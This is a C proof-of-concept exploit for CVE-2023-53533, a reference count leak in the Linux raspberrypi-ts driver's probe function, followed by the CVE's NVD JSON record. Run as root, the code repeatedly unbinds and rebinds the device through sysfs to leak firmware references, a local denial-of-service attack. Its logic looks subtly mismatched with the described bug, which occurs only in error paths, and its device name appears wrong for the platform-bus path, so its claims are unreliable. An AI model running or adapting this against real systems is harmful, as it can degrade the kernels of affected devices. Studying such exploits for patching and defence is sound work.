CVE-2023-53533

/* * CVE-2023-53533 PoC * Reference count leak in raspberrypi-ts driver rpi_ts_probe() * * This PoC demonstrates how to trigger the reference count leak * by repeatedly causing the rpi_ts_probe function to execute * without proper cleanup of rpi_firmware_get() reference. * * Compile: gcc -o poc poc.c * Run: sudo ./poc [iterations] */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <errno.h> #include <sys/stat.h> #define DRIVER_PATH "/sys/bus/platform/drivers/raspberrypi-ts" #define DEVICE_NAME "1-0041" #define DEFAULT_ITERATIONS 100 /* Trigger driver bind/unbind operation via sysfs */ int trigger_driver_action(const char *action) { char path[512]; int fd, ret; snprintf(path, sizeof(path), "%s/%s", DRIVER_PATH, action); fd = open(path, O_WRONLY); if (fd < 0) { fprintf(stderr, "[-] Failed to open %s: %s\n", path, strerror(errno)); return -1; } ret = write(fd, DEVICE_NAME, strlen(DEVICE_NAME)); close(fd); if (ret < 0) { fprintf(stderr, "[-] Failed to write to %s: %s\n", path, strerror(errno)); return -1; } return 0; } /* Check if the driver is loaded */ int check_driver_available(void) { struct stat st; if (stat(DRIVER_PATH, &st) != 0) { return 0; } return 1; } int main(int argc, char *argv[]) { int i, iterations = DEFAULT_ITERATIONS; if (argc > 1) { iterations = atoi(argv[1]); if (iterations <= 0) { fprintf(stderr, "[-] Invalid iteration count\n"); return 1; } } printf("[*] CVE-2023-53533 PoC - Reference Count Leak\n"); printf("[*] Target: raspberrypi-ts driver\n\n"); if (!check_driver_available()) { fprintf(stderr, "[-] Driver path not found: %s\n", DRIVER_PATH); fprintf(stderr, "[-] This PoC requires a Raspberry Pi with raspberrypi-ts driver\n"); fprintf(stderr, "[-] Try: sudo modprobe raspberrypi-ts\n"); return 1; } printf("[*] Triggering %d probe iterations to leak firmware references...\n\n", iterations); for (i = 0; i < iterations; i++) { /* Unbind the device to allow re-probe */ if (trigger_driver_action("unbind") == 0) { usleep(10000); /* 10ms delay */ } /* Rebind to trigger rpi_ts_probe() */ trigger_driver_action("bind"); usleep(10000); if ((i + 1) % 10 == 0) { printf("[+] Iteration %d/%d completed\n", i + 1, iterations); } } printf("\n[*] PoC execution completed\n"); printf("[*] Check kernel logs (dmesg) for firmware reference warnings\n"); printf("[*] Monitor /sys/kernel/debug/rpi_firmware/info for reference count\n"); return 0; }

{"cve": {"id": "CVE-2023-53533", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:48.217", "lastModified": "2026-03-25T00:37:53.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: raspberrypi-ts - fix refcount leak in rpi_ts_probe\n\nrpi_firmware_get() take reference, we need to release it in error paths\nas well. Use devm_rpi_firmware_get() helper to handling the resources.\nAlso remove the existing rpi_firmware_put()."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0", "versionEndExcluding": "5.4.243", "matchCriteriaId": "1B689982-DA6B-4FA7-8C4E-28584A673F6C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.180", "matchCriteriaId": "78422AC3-CC89-479E-B4BC-62381D8F3564"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.111", "matchCriteriaId": "2B9DD776-7F17-4F72-B94F-54BFCBC692DD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.28", "matchCriteriaId": "08F855F4-7188-4EE1-BD79-D4B6C7E2EF54"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.15", "matchCriteriaId": "3844A90B-940D-46C3-8D7B-9FF63F1AFC2F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.3", "versionEndExcluding": "6.3.2", "matchCriteriaId": "38F6F330-91A0-4675-8B90-6F950471A7CC"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0d6a5c9489c8a3d434e685066119c4333476dccd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/1dfa3c9dd27bdc347733d06e980395768520bc3e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/36d087e49dabd28d2c13a7532dac72d625ce69fb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5bca3688bdbc3b58a2894b8671a8e2378efe28bd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7acad58049acc6ac148e8b613a6eceeca4bcb4a7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9216aa5cfd86809a2681be3683cd9ac30432de0c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9dbbe9db224c23a60dc7b1e00c701be93328c873", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}